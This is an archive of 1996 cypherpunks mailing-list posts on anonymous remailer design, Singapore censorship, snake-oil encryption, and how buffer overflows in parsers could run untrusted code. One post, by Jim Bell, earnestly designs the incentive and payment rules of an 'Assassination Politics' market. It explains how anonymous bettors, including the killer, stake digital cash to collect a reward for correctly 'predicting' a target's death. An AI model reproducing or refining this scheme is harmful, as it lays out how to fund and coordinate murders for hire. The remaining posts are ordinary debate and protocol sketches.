> We could create a network of anonymous remailers with mailboxes. All
> messages in the mailboxes are stored encrypted. No information about the
> users are keep. Users would be be given x K of mailbox space.
> 
> We could use PGP keys for encrypting the messages. Each user would have his
> own key pair for his anonymous mailbox. Any plain text messages received to
> the server would be encrypted on recept.
> 
> Let the government's subpoena away. :)
> 
> "Sorry we don't have user addresses, no I can't decrypt those messages
> Senator." <BEG>
> 
> What do you think?

The only problem is there has to be someway for users to retrieve their mail.
The current nym server approach is to use an encrypted reply block to send a
user new mail.  This way the nym server doesn't know who the user is.  If users
have to actively retrieve their mail, then the feds could install a packet
sniffer on the remailers net link to find out the real email address of an
anonymous user.

- -- Mark

PGP encrypted mail prefered.
Key fingerprint = d61734f2800486ae6f79bfeb70f95348
http://www.voicenet.com/~markm/

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3
Charset: noconv

iQEVAwUBMiscESzIPc7jvyFpAQGQ8ggAoHoGwwLI/8WI3XEBvA/Yo/lOPu1bQGYZ
+m/jYzZjlF/YcS54J+H+L+xRo9WcOJkm7LLetTRZM3N/vG71M01vLcoOnfciRjFz
AhLj2V5DGEcyQE0GMBXOxgxKvnzMVkFJh6ZWFalIM0DedncdX541W3j+almPb7Yr
YyT+On5mqbPd0U5rJgv2CfE5CFlAE7XyO0KteH5aONK3f6TxzGH4cGG8wSZaBiu4
jP55nTl8VdtMH7MBDqOFkAH7IOboDZzjDglbuFHFk/nhtKfYIzg4c/ck5VCZ1vs8
xIqaPIMzpQF/smfKS2upyhZB1fb3G101lUJmjoVkEATQhwMzLBhY1Q==
=QbyB
-----END PGP SIGNATURE-----






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hallam-Baker <hallam@ai.mit.edu>
Date: Tue, 3 Sep 1996 11:52:36 +0800
To: cypherpunks@toad.com
Subject: Re: DON'T Nuke Singapore Back into the Stone Age
In-Reply-To: <50a42c$nph@life.ai.mit.edu>
Message-ID: <322B5BFD.41C6@ai.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


Timothy C. May wrote:

> The point is to make clear to them that the Usenet and similar Web sites
> are global in nature, not subject to censorship without a very high local
> cost. If discussions of Lee Kwan Yew's dynasty are considered illegal, then
> Singaporans will have to choose not to carry the various newsgroups into
> which *I* post such messages!

If the govt. of Singapore wish to keep their people in ignorance of
their
corruption it is going to be harder than banning a few newsgroups. I
would
expect the opposition to be scanning USEnet and like fora for email
addresses
ending with .sg and spamming appropriately. 

The irony of censorship is that its rarely effective and almost always 
superfluous. The people of singapore are aware that their government is 
corrupt. They vote it back in because they expect the alternative to be 
at least as corrupt. Its much like the US where there is a choice
between
the rightwing authoritarian Republican Party and the authoritarian, 
rightwing Democrats. 

> (This was done by many of us during the Karla Homulka and Teale trial in
> Canada a couple of years ago: Canada imposed press restrictions on
> discussion of the trial and the grisly evidence...and then was chagrinned
> to find that the global Net did not adhere to their notions of what should
> and could be discussed. They even seized copies of "Wired" at the border,
> very much akin to Singapore's stone age policies.)

There is a big difference between the Canada situation and the Singapore
situation. In Canada the restrictions are temporary and stem from making
the right to a fair trial a higher priority than the right to free
speech.
It is a conflict of two competing individual liberties. No observer of
the
OJ Simpson trial could state that the media coverage did not affect the 
outcome. The arguments that Mill advances for freedom of speech in On
Liberty
do not apply in the context of a temporary judicial injunction, they are
utilitarian (suprise) and applying his general principle of "interests"
would favour the temporary restriction.

The situation in Sigapore is simply a corrupt government trying to
supress
legitimate democratic discussion. The intention is not to protect an 
individuals right to a fair trial, the intention is to restrict argument
permanently.

It is important that in an international forum people don't start
imagining
that their local customs are universally accepted as superior. The
difference
between Canadian and US law is a minor one and relates to different 
interpretations of a common principle. There is a vast gulf between the
Singapore position and that of either the US or Canada. This is not
simply
a difference of local interpretation.


		Phill




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Tue, 3 Sep 1996 13:06:28 +0800
To: jf_avon@citenet.net
Subject: Assassination Politics Question
Message-ID: <199609030140.SAA24561@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 06:10 PM 9/2/96 -0500, correspondent wrote:

>If there are more than one accurate prediction for an even, how will 
>CP Server will allocate the prizes?  What made me think of that is 
>that, only in the case of famous peoples, a very smart individual 
>might make a prediction simply out of being smart and informed.

To a first approximation, they could split the reward among the correct 
guessers. 

This is an issue that I considered in some detail a year ago, but which 
(surprisingly enough) hasn't been raised by others.  As I pointed out in AP 
part 1, it is necessary to reduce  "shotgun guesses" among people who simply 
guess a date (or many dates) and make a bet.  That's why I included the 
system of requiring the predictor to include a payment with the prediction, 
in such a way that the prediction remains anonymous while the included money 
is always paid to the AP organization.  This might initially appear to be a 
burden to the potential "guesser"/killer, but in fact if he understands the 
reason for it he'll want the system in place:  It's one of the main ways to 
avoid the situation where multiple people make guesses for a particular 
person and date, and thus it would tend to ensure that the successful 
"guessor" is the only one to make that guess.

Some of my analysis in AP part 1 was superficial and not really accurate, because  
in the example it gave, it suggested that the amount of money that would have 
to be included might be as little as 1/1000th of the reward money.    
However, chances are it'll usually be somewhat higher for this reason:  
Let's say a person does something REALLY AWFUL, such as Jeffrey Dahmer or 
another multiple murderer.  Suddenly, he goes from completely anonymous to 
Public Enemy #1.  One would suppose that if AP was operating "efficiently," 
he'd be dead in a week.  However, if indeed he's dead in a week, and you 
only have to pay 1/1000th per day to place your bet on his demise, you could 
(hypothetically) make your bet for all seven days, paying a total of 
7/1000th of the prize, and assuming the death occurred any day that week 
you'd be guaranteed to share in that prize.

But that's the problem:  You'd only _share_ in that prize, because many 
other people would get the same idea and they'd make similar bets, and the 
thing would simply turn into a Lotto-type game.  The potential killer out 
there, aware of this problem, would hesitate to make his bet under those 
circumstances, because it is almost certain he'd lose at least part of the 
prize to others.  The result would be a great deal of suspense, because 
nobody would know when somebody is actually going to place a prediction and 
carry out a killing.  The AP organization would rake in the money from all 
those bets, but the killing would be delayed and the betting public would 
become unhappy.  At some point the "prediction" donations would slow down, 
and perhaps a killer would take this as a cue to actually make his prediction.

One way to avoid this is to carefully adjust the amount of payment that's 
required with the "prediction," raising it _just_enough_ to deter all but 
"informed guessing" among people who know what's going to happen. Or, at 
least, to reduce "uninformed guessing" to a level which doesn't dramatically 
affect the fulfillment of the donations.  The problem with this is that this 
price-setting would be a lot of work, and is not likely to produce the 
"right" price.  It would be somewhat akin to the kind of central planning 
that the communists never did very well.  The problem with trying to set a 
price like this is that to do it right, requires WAY too much knowledge, 
knowledge that will often only be known by a small number of people that you 
can't identify.

Perhaps the most obvious solution is to allow the free market to decide how 
much a given prediction is worth.  In other words, the Invisible Hand of 
Adam Smith.  Instead of asking for some specific amount of money along with 
any given prediction, simply announce that along with a prediction the 
predictor ought to include some portion of digital cash, although there 
would be no minimum amount required.  Assuming the associated prediction 
turns out to be true, the reward fund will be distributed on a pro-rated 
basis, divided up based on the amount of prediction.  For example, if you're 
the killer and you include a dollar with your prediction, and I'm a random, 
guessing predictor and I include a dime, you get 1/1.1 of the reward and I 
get 0.1/1.1.  Had you included $10 with your prediction, you'd have won 
10.00/10.10, and I'd get 0.1/10.10.  

Sure, the amount a predictor included might be as little as a dime, and if 
that's the only correct prediction he'll get the entire amount of the 
reward.  But a killer would be stupid to ONLY include a dime, because 
somebody else could, likewise, include a dime per day for a prediction for a 
given person, and then he'd get half of the reward if nobody else did the 
same thing.  And since it would only cost him $0.10 per day or $36.50 per 
year for a given person, he'd be dollars ahead to do this.

It should be clear that a person who really KNEW that the target would die 
on a particular day would want to include enough digital cash to help ensure 
that he's the beneficiary of a good fraction of the reward, ideally most or 
all of it.  On the other hand, he won't want to include so much that it's 
"too much" a proportion of the reward itself, since the payment is 
non-refundable and it reduces his net reward.  The random guesser likewise 
wants to maximize his share, but unlike the killer does not have the 
specific knowledge that the death will occur on that particular day.  

With this system, the market is responsible for finding its own equilibrium 
point.  The AP organization need not decide how likely a given death is, and 
how much money to ask for.  Its job is made substantially simpler.
 

Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Tue, 3 Sep 1996 12:25:19 +0800
To: "James A. Donald" <angelos@gradin.cis.upenn.edu>
Subject: Re: FLT 800: From the Rumor Mill...But It Makes Sense.. (fwd)
Message-ID: <199609030140.SAA24564@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:59 PM 9/1/96 -0700, James A. Donald wrote:
>At 09:04 PM 9/1/96 -0400, Alan Horowitz wrote:
>> The Aegis ship in the Gulf wzs not in an exercise. It was in a war zone.
>>
>> If my memory serves, the Iranian jetliner had its squawker turned off, or 
>> broken.
>
>Your memory does not serve:  The computers record of the events was:
>
>Computer tells crew:  Civilian jetliner on radar.
>
>Crew expecting an attack by jetfighters, tell computer to shoot it down.
>
>Computer does not put up a bunch of dialogs saying:  "Hey, I think this
>is a CIVILIAN airliner, did you get that CIVILIAN airliner, are you quite
>sure you want it shot down?  Instead it just shoots it down.

Suggestion for future improvement...

C:>DEL AIRLINER.COM   Are you sure? (Y/N) _


Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hallam-Baker <hallam@ai.mit.edu>
Date: Tue, 3 Sep 1996 16:10:11 +0800
To: James Seng <cypherpunks@toad.com
Subject: Re: DON'T Nuke Singapore Back into the Stone Age
In-Reply-To: <50dcvo$qop@life.ai.mit.edu>
Message-ID: <322B62FD.167E@ai.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


One of the things that you are probably not aware of is that your
government tracks every phone call you make and has a complete list of
everyone who you comunicate with. This information is then used to
identify potential dissidents who can be "monitored" - just like in the
old USSR.

I know that this is a fact because I know people in the business. They
also tell me that they prefer to dissuade people from entertaining
guests at home. The assumption being that the more private conversations
take place the more opportunities to criticise the government there are.

>Now, what makes you think that citizen of Country A has the power or 
>rights to tell politicians of Country B what to do and what they cannot >do?

What makes you think that the concept "country" has any legitimacy
whatsoever?

The Web is not politically neutral. I intended the Web to be an agent of
social change. The corruption of the present social order should be
apparent from the fact that we destroy food while people starve, the
majority of the worlds population have no political rights and political
participation is only available to a tiny minority.

The Web will have an effect whenever there is an internal inconsistency
within a social order. The interaction of opposed cultures via the Web
will reveal these inconsistencies in a manner that requires them to be
resolved. 

The people of Singapore are not going to change their government because
the US people convince them of the superiority of US culture. While it
is patriotic for a US citizen to believe a-priori in US superiority it
is unpatriotic for anyone else. What will change the government of
Singapore is revealing the internal inconsistencies of the governments
claims. 


		Phill




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Tue, 3 Sep 1996 13:11:22 +0800
To: cypherpunks@toad.com
Subject: [BEATING A NOT QUITE DEAD] Passive Trojan [HORSE] (was:Re: HAZ-MAT virus)
Message-ID: <199609030151.SAA07328@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


>The key to the success is that the application in question has to be 
>compromised to respond to these codes, either by design or by hacking. 
>Either way the individual responsible must modify the execution 
>mechanism, not just the data itself.

A well-written program is hard to exploit, but badly written programs
can often be exploited in ways that allow execution of untrusted code.
For instance, the fingerd bug exploited so spectacularly by Robert Morris
handed a program more input that it was ready to accept, and the program
stupidly kept writing the input into the array, past the end, and out
into the stack, where it could be later interpreted as executable code.

If a popular GIF or JPEG interpreter was written that badly, you could 
possibly devise a GIF that lies about how big it is and encourages
the program to scribble on its stack.  Now, there probably aren't any
like that, and it'd probably have to be Netscape or MSIE or Lview
to be widespread enough to make an attack like that worthwhile.
(I'd bet on MSIE, of the three of them :-)  Does Microsoft have some sort
of Really Cool Extension to JPEG, allowing Macros for Self-Modifying JPEGs,
trying to out-do Netscape's animated GIFs?)

>Let's see -current examples of computing items with this kind of a 
>"feature"... magic cookies, macros, OLE, DDE, MS Objects, JAVA, and the 
>list keeps growing.

Back when Good Times came out, everyone denied that it was possible
for there to be any risk from a text file (though, as I pointed out,
escape-sequence hacks have been used occasionally for over 15 years),
and not long after that, the MSWord Macro Viruses started appearing.
Bad Code can't always be hacked usefully, but it can always be hacked...

#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts@ix.netcom.com
# <A HREF="http://idiom.com/~wcs"> 	
# You can get PGP software outside the US at ftp.ox.ac.uk/pub/crypto





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Tue, 3 Sep 1996 17:19:15 +0800
To: C Matthew Curtin <cmcurtin@research.megasoft.com>
Subject: Re: Pseudocrypto detector is going wild (was: Re: ALPHACIPHER - An unbreakable encryption program.)
In-Reply-To: <864tlgivwo.fsf@goffette.research.megasoft.com>
Message-ID: <Pine.SUN.3.94.960902185416.3068A-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain


On 2 Sep 1996, C Matthew Curtin wrote:

Alex Walker <survival@aa.net>> claims:

> > The strongest encryption system available to the public will be
available
> > soon at:

[Blah Blah Blah]

> > 
> > A demo of this program along with a FAQ can be downloaded from
> > cyber-survival-hq 1SEP.  This is an unbreakable program...
> 
> Here we go again.
> 
> I just got done surfing the site above. Assuming that all statements
> regarding the unbreakability of the cipher, the lack of applicability
> of the question regarding its key size, etc., are at least based on
> some degree of truth, "alphacipher" is a one-time pad. Given that
> anything else is not really "unbreakable," if it's not a one-time pad,
> the claims about its security are bogus.

Looks like another snake oil peddler.

Look, Mr. Walker:

Either you are a marketing type, in which case I suspect you have no idea
what you are peddling, you are a techncal type, in which case you are
deceiving us, or you don't really know what you are doing, in which case
you are making representations without the benefit of knowledge.

In any of these cases, you are, it seems to me, peddling garbage.

> If I'm wrong, please show me how so. If not, please do us all a favor
> and quit with the advertising claims.

Crypto, for some reason, seems to be at the level of hair tonic when it
comes to hype advertizing making up for 0 in product quality.

> (All I need now is someone to threaten to sue me, and I'll maintain my
> record of having lawsuit threats made against me every time I
> criticize something that claims to be "strong crypto.")

Any attorney who knew anything would have that suit laughed out of court.

If he sues in D.C. come see me.

> - -- 
> C Matthew Curtin                MEGASOFT, INC                Chief Scientist
> I speak only for myself.  Don't whine to anyone but me about anything I say.
> Hacker Security Firewall Crypto PGP Privacy Unix Perl Java Internet Intranet

--
I hate lightning - finger for public key - Vote Monarchist
unicorn@schloss.li





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: DAVID A MOLNAR <molnard1@nevada.edu>
Date: Tue, 3 Sep 1996 13:50:57 +0800
To: Sean Sutherland <maverick@thepentagon.com>
Subject: Re:
In-Reply-To: <19960825000344312.AAA199@maverick>
Message-ID: <Pine.OSF.3.91.960902183532.8594B-100000@pioneer.nevada.edu>
MIME-Version: 1.0
Content-Type: text/plain




On Sat, 24 Aug 1996, Sean Sutherland wrote:
> > Does anybody know what I can get for generating the credit card
> >  numbers?
> > 
> 
> And they say there's hope for the youth of America.
	It would seem that the hope of the "youth of America" lies in 
convincing all others they do not exist. After all, if behaviour is the 
only standard by which to determine age, one only exists as a "youth" 
when one exhibits the negative qualities of childhood. This is then used 
as an excuse to segregate, control, censor, and reject one's input on the 
grounds of age. 

The offense is not being a youth. The offense is getting caught. Clueless 
remarks (as the above), are a form of "getting caught". 

Personally, I wouldn't be surprised to see "the youth of America" emerge 
as one of the biggest users of nymservers and anon remailers. With the 
push toward hard identities we're likely to see, I think more and more 
"youth" will come to realize how limiting the stigma of 'child' or 
'teenager' can be, and will work to trandescend it. Besides, there's 
always the need to hide from parents. An entire generation of people 
disappearing into the woodwork, so to speak(*). 

Expect to see a lot of ranting about how the Internet is "stealing away 
childhood" when people finally catch on to what's happening. You could 
say that the current child porn hysteria is just the opening shot. I 
wonder what kinds of laws we will see. Perhaps it will become illegal 
to operate a computer without a license. :-)

-David Molnar

* Yes, yes, "an entire generation" is overreaching future-speak. It 
ignores the millions of people who can't or won't have access to the Net, 
it assumes everyone will want freedom (after all, people stay in AOL's 
monitored chat rooms and speak Beavis and Butthead to each other all day 
long), it assumes enough things to make it a piece of empty rhetoric. 
However, it's a nice-sounding piece of empty rhetoric. 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: James Seng <jseng@pobox.org.sg>
Date: Mon, 2 Sep 1996 19:56:36 +0800
To: Bill Stewart <stewarts@ix.netcom.com>
Subject: Re: Encourage Singapore To Come Out Of the Stone Age
Message-ID: <199609020913.TAA11331@jagumba.anu.edu.au>
MIME-Version: 1.0
Content-Type: text/plain


At 11:29 PM 9/1/96 -0700, Bill Stewart wrote:
>bring it into disrespect deserves no respect at all.  Any government 
>that claims to have the god-like wisdom to dictate what's best for
>its subjects to hear or what religious ideas to believe doesn't
>deserve to be listened to, much less obeyed.   If Singapore's government
>and religious leaders want to say "Our ideas are better than American
>ideas", and you or I or your neighbor want to listen to them, fine;

I think you have misunderstood my posting. I never say Singapore ideas are
better than American ideas. What i am saying is that Asian (Singapore)
values are _DIFFERENT_ from western (America) values. [i know i am generalising]

When you look at the laws and regulation. You cannot just look at what you
think is best. You have to look at other things. Culture, social and
economical structure, religion and history. In every aspect, Singapore (or
most Asian for that matter) are different. Thus, you cannot judge a
Singapore government action based on your social background.

My purpose of posting is to hope to bring some light to the people here
about some social norm in Singapore, hopefully to explain why the government
choose to block certain WWW and yet was not strongly opposited here.

Secondly, you do not need to convience me. I agree with you totally. What
you have to convience is the general population here, against the culture,
the society and everything.

>maybe some of their ideas are better than some of the many ideas
>floating around North America.  But if you or I or your neighbor
>want to listen to competing ideas, and even to believe and talk about
>competing ideas, neither you nor the government have the right to
>stop them - only to refute them with better ideas.

Nope. I am open to ideas which is why i been watching to this thread. I find
it is rather constructive to see how people think about Singapore and then
compare it with my own ideas. However, i also know it is useless to have
continue discussion with fanatic as they have a tendancy to distored what
you say to suit their argument. Nor are they particular open minded to
listen to others like our dear Tim has clearly shown us. This is why i am
responsing to your article and not his.

>On the other hand, if a power-hungry government decides that it doesn't
>like American TV, forbids business licenses to anyone who broadcasts it,
>and jails anyone who broadcasts TV without a business license,
>they're more corrupt than a government that forbids business licenses to
>anyone who doesn't pay a bribe.  (At least in a kleptocracy,
>you can usually print or say what you want if you pay the bribes, 
>though my father-in-law's newspaper was once shut down for printing 
>that the mayor was taking bribes, and who they were from, and how much.)

Sad to say, Singapore government does have a lot of power. But i am glad
what you mention isnt happening in Singapore. I havent heard of any serious
corruption cases or people accepting bribes etc. Nor does the people here
feel a suppressed nor are there general disatifaction. I think you are too
influenced with the persepection from 1984. *8)

All things works both ways. Power is no otherwise.

>This also means you don't know what is safe to print and what isn't.
>You have to restrict yourself very strongly, because otherwise
>some politically influential person will complain to the government,
>and you go to jail.  At least if the government tells you what
>the rules are, you know it's safe to say things that don't violate them.

You dont go to jail for writing articles. You might be sue for deframation
if you published something untrue (similar to your civil lawsuit i guess?)
and have to pay large sum of money to the person but you dont go to jail.

And yes, they are telling the people what _are_ the things now so you know
what to avoid.

>It also means that if enough people want information badly enough,
>the government may know not to censor it.  On the other hand,
>a government that can keep the leader of an opposition political party
>in jail for years just because he opposes them is pretty corrupt.

I am not interested in politics so i didnt really know what is happening in
that case. for that, i have no comment.

>The right to speak freely without government thugs shutting you down
>and throwing you in jail or killing you is a universal one. 
>The ability to get anybody to listen to what you have to say,
>on the other hand, is highly dependent both on general culture
>and on the interests of the individuals you hope will listen,
>as well as on what you have to say and your ability to say it well.

Very true. So does the First Amendment said. Singapore does have such
similar law as First Amendment which is slight "modified". You have freedom
of speech as long as your comments does not endanger religious/racist
harmony and national security. (I do not know the exact term..need a lawyer
for that..). The reasons for this are for historical reasons which trace back.

>Because I have a mouth and a conscience, and they have ears and consciences.  
>I certainly have more right to tell a politician in Country B not to
>stop his subjects from speaking than he does to order them not to speak.
>And if the politicians over here are wrong, which they often are,
>you've got the right to tell them that too.  Of course, the politicians
>over here usually won't listen to you, and the politicians over there
>either won't listen to me or they'll add my name to the firewall killfile :-)
>But it's also safer for me to tell your politicians to behave well than
>for you to tell them, since you have to live with them.

Fair enough. Point taken and you are right. I was able to say that you are
not the one who are going to vote for/against them in the next election. *8)

>It's not off-topic.  Building tools to prevent censorship is 
>distinctly on-topic for cypherpunks, and an occasional digression into
>whether it's a good idea is worthwhile.

Perhaps but not to the other thousand of other cypherpunk subscribers. With
this, i hope i have explained any misunderstanding with the previous
posting. If you wish to carried on with this discussion, please feel feel to
email me directly.

-James Seng





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: paul@fatmans.demon.co.uk
Date: Tue, 3 Sep 1996 09:11:51 +0800
To: cypherpunks@toad.com
Subject: New cryptography www site
Message-ID: <841692280.5131.0@fatmans.demon.co.uk>
MIME-Version: 1.0
Content-Type: text/plain


Hi all,

Just announcing my cryptography www site, it`s very new so the 
content isn`t all there yet but it`s worth a look, email me and tell 
me what you think, also if anyone has any research papers on 
cryptography in ASCII, doc etc.. formats could they email them to me 
for putting on the pages...

the URL is Http://www.fatmans.demon.co.uk/crypt/index.htm

  Datacomms Technologies web authoring and data security
     Paul Bradley, Paul@fatmans.demon.co.uk
       Http://www.fatmans.demon.co.uk/crypt/
         "Don`t forget to mount a scratch monkey"

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6

mQCNAjH9j+cAAAEEAMBvREiQR0ot9dFCO0TiSCSunAYLv2g1Bc6I3bz8FzKXNH53
6mieJf/W4rD+CxJpT0q9RQaaoRtkHJLwbjfK2il3D7mEahMAyqvF/xRJNqkXfhM3
sRJM0Jh43l+W0M5vwokbEbk25/bxWWGspTsLD3YHbzKnG6pOcL5OPIRbv66xAAUR
tCdQYXVsIEJyYWRsZXkgPHBhdWxAZmF0bWFucy5kZW1vbi5jby51az4=
=riHc
-----END PGP PUBLIC KEY BLOCK-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: paul@fatmans.demon.co.uk
Date: Tue, 3 Sep 1996 11:11:38 +0800
To: cypherpunks@toad.com
Subject: Re: Free Speech and List Topics
Message-ID: <841692279.5129.0@fatmans.demon.co.uk>
MIME-Version: 1.0
Content-Type: text/plain



 
> More disturbing to me recently has been the steady increase in subscribers
> to this list who don't seem to value free speech very highly, who write of
> their own nation's censorship as valiant efforts to protect citizen-units
> from foreign devils, and, even more shockingly, from supposed defenders of
> electronic freedom who are now talking about the need for limits on
> anonymity.

I too have noticed this, but we must remember that although we are 
the people who see the tyranny of censorship etc. all to clearly we 
are in a very small minority, the majority of people do not support 
censorship because they have made a reasoned judgement, the either 
support it because they are too lazy to do anytthing, too shit scared 
of the government if they do, or they just do not take the time to 
understand the issues and so support the common view, there is also 
the case that many people "go with the majority", because they do not 
want to appear different, and the media has so demonized free speech 
and liberty advocated that to associate yourself with them now is 
equivalent to telling people you are a rampant sexually deprived 
paedophile in an anorak.


  Datacomms Technologies web authoring and data security
     Paul Bradley, Paul@fatmans.demon.co.uk
       Http://www.fatmans.demon.co.uk/crypt/
         "Don`t forget to mount a scratch monkey"

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6

mQCNAjH9j+cAAAEEAMBvREiQR0ot9dFCO0TiSCSunAYLv2g1Bc6I3bz8FzKXNH53
6mieJf/W4rD+CxJpT0q9RQaaoRtkHJLwbjfK2il3D7mEahMAyqvF/xRJNqkXfhM3
sRJM0Jh43l+W0M5vwokbEbk25/bxWWGspTsLD3YHbzKnG6pOcL5OPIRbv66xAAUR
tCdQYXVsIEJyYWRsZXkgPHBhdWxAZmF0bWFucy5kZW1vbi5jby51az4=
=riHc
-----END PGP PUBLIC KEY BLOCK-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: paul@fatmans.demon.co.uk
Date: Tue, 3 Sep 1996 12:04:09 +0800
To: cypherpunks@toad.com
Subject: Secure anonymouse server protocol: comments please
Message-ID: <841692281.5135.0@fatmans.demon.co.uk>
MIME-Version: 1.0
Content-Type: text/plain



The following is a very sketchy plan for a secure protocol for an 
anonymous server which allows replies without storing a recipient 
database in the clear.

To send a message:

The sender first exchanges keys with the sever (public key 
cryptography assumed), the server now has the users key and the user 
the servers.

The user sends the server:

The recipient for the message
the message itself
a password previously agreed
The users ID on the server

The server decrypts to get the above back in plaintext, then it 
encrypts the ID & the users address with a random session key and 
stores it in the database. notice nothing is stored in the clear
the server now encrypts the session key with the senders public key, 
and fowards it to the sender of the original message.
now finally the server sends the message onto the intended recipient 
in plaintext (who must also have exchanged keys with the server) along 
with the ID of the sender encrypted with the servers public key.
the recipient responds with his reply, and the ID of the sender still 
encrypted in the servers Public key

The server stores this

When the user (the original sender) wants to pick up his mail after a 
couple of days he sends the server his ID encrypted with the servers 
public key, the server compares this with all of the encrypted IDs in 
the database and when it finds a match it fowards the corresponding 
mail to the original sender of the first message.
Thats all folks.

This system has 1 huge fault, we can encrypt a uses ID with the 
servers public key to see what his ID in the encrypted database is 
and therefore identify him, maybe we need two seperate server public 
keys, and when IDs come in encrypted with key1 (the one it releases) 
it decrypts with secretkey1 then encrypts with publickey2 (the one it 
keeps secret)

or maybe we can just hash and sign the IDs in the database?

as I said it`s very sketchy, I made most of this up as I wrote it so 
if you must tear it to pieces please do so constructively, it could 
be the route to a secure system....

   

  Datacomms Technologies web authoring and data security
     Paul Bradley, Paul@fatmans.demon.co.uk
       Http://www.fatmans.demon.co.uk/crypt/
         "Don`t forget to mount a scratch monkey"

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6

mQCNAjH9j+cAAAEEAMBvREiQR0ot9dFCO0TiSCSunAYLv2g1Bc6I3bz8FzKXNH53
6mieJf/W4rD+CxJpT0q9RQaaoRtkHJLwbjfK2il3D7mEahMAyqvF/xRJNqkXfhM3
sRJM0Jh43l+W0M5vwokbEbk25/bxWWGspTsLD3YHbzKnG6pOcL5OPIRbv66xAAUR
tCdQYXVsIEJyYWRsZXkgPHBhdWxAZmF0bWFucy5kZW1vbi5jby51az4=
=riHc
-----END PGP PUBLIC KEY BLOCK-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@voicenet.com>
Date: Tue, 3 Sep 1996 14:46:30 +0800
To: cypherpunks@toad.com
Subject: Re: Cypherpunk Mailboxes?
In-Reply-To: <Pine.LNX.3.94.960902165706.10756A-100000@anx0918.slip.appstate.edu>
Message-ID: <Pine.LNX.3.95.960902192700.1066A-100000@gak>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Mon, 2 Sep 1996, The Deviant wrote:

> Hrmm.. perhaps there's a better way...
> such as having the user and the mail server negoiae a key (i don't really
> know the details of diffie-hellman or he like, so tell me if this isn't
> feasable), and have the encryption/decypion routines strip addresses,
> so that the person is only identifiable by their key...

The mail server still has to send packets to the user.  A packet sniffer might
not be able to find out the actual contents of the transmission, but it would
be able to find out the host that has made the connection.  If this is combined
with the knowledge of the times that certain user's mailboxes get cleared out,
it would be possible to find out which nyms belong to which people.  The
current nym servers that automatically forward mail do not have this problem.

- -- Mark

PGP encrypted mail prefered.
Key fingerprint = d61734f2800486ae6f79bfeb70f95348
http://www.voicenet.com/~markm/

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3
Charset: noconv

iQEVAwUBMituHCzIPc7jvyFpAQFXSQf9FS30slaO7LDllILC+eEdk/7aBAy312MY
esRgbc2EUI7W1WBsujrCznLrbzki0MZ58djDxAmIlz2+YzmQFAMpCx1YGaEkTLIt
o4//O6KnAkXde1no+WJXuNry3gzXUDgrUG3S8s3HCDsPfmu1x25J/M8nrL9ijx42
Jd2q9Z/wdAZxIFuUUoZotbUDIwXkHk17l+rNVUL5Pt4ukVd2M85wDp6EpWRCWsQP
Xjgwp8FdYd8m/tqxjIygyog5tfsV3qD4ve8Wl7E0MaWkqPyvzb843G0VXSKfI0iH
fE1WaHmqvF+VwPU/I2BXnjMjWK4xOW/pKk3llQFSEj8frFGjtqn1ag==
=3Phf
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Tue, 3 Sep 1996 11:57:59 +0800
To: tcmay@got.net
Subject: Re: Free Speech and List Topics
Message-ID: <01I90JJH1NJ49JDDSI@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"tcmay@got.net"  2-SEP-1996 05:36:20.36

>No self-respecting Cypherpunk thinks the Antitrust Act and related acts are
>worthy of enforcement.

>(Think of how the technology we support will tend to allow new avenues for
>price collusion, interlocking directorates, new forms of business combines,
>unreadable secure communications with foreign competitors, and so on, all
>things the Antitrust regulators are already growing worried about.)

	There's a difference between thinking something shouldn't be enforced
(e.g., drug laws for adults) and thinking that other things - such as privacy
and free speech - are more important than fully effective enforcement of
something (anti-terrorism measures, AntiTrust Act, etcetera). I don't think
that transparent houses, as Perry put it, should be required to prevent murders
- but I don't approve of murders either. It's a problem with means, not ends.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rabid Wombat <wombat@mcfeely.bsfs.org>
Date: Tue, 3 Sep 1996 16:36:54 +0800
To: Hallam-Baker <hallam@ai.mit.edu>
Subject: [OFF TOPIC] Re: SCO giving free licenses to UNIX OpenServer
In-Reply-To: <322B4E8E.41C6@ai.mit.edu>
Message-ID: <Pine.BSF.3.91.960902191331.22632A-100000@mcfeely.bsfs.org>
MIME-Version: 1.0
Content-Type: text/plain



Ah, round 274,562,889 of the OS wars ...


On Mon, 2 Sep 1996, Drr Phill wrotee:

> Eric Murray wrote:
> > 
> > Scottauge@aol.com writes:
> 
> Errmm.. hate to disappoint but SCO UNIX started life as Xenix which
> was written by Microsoft in the dark ages. 
> 

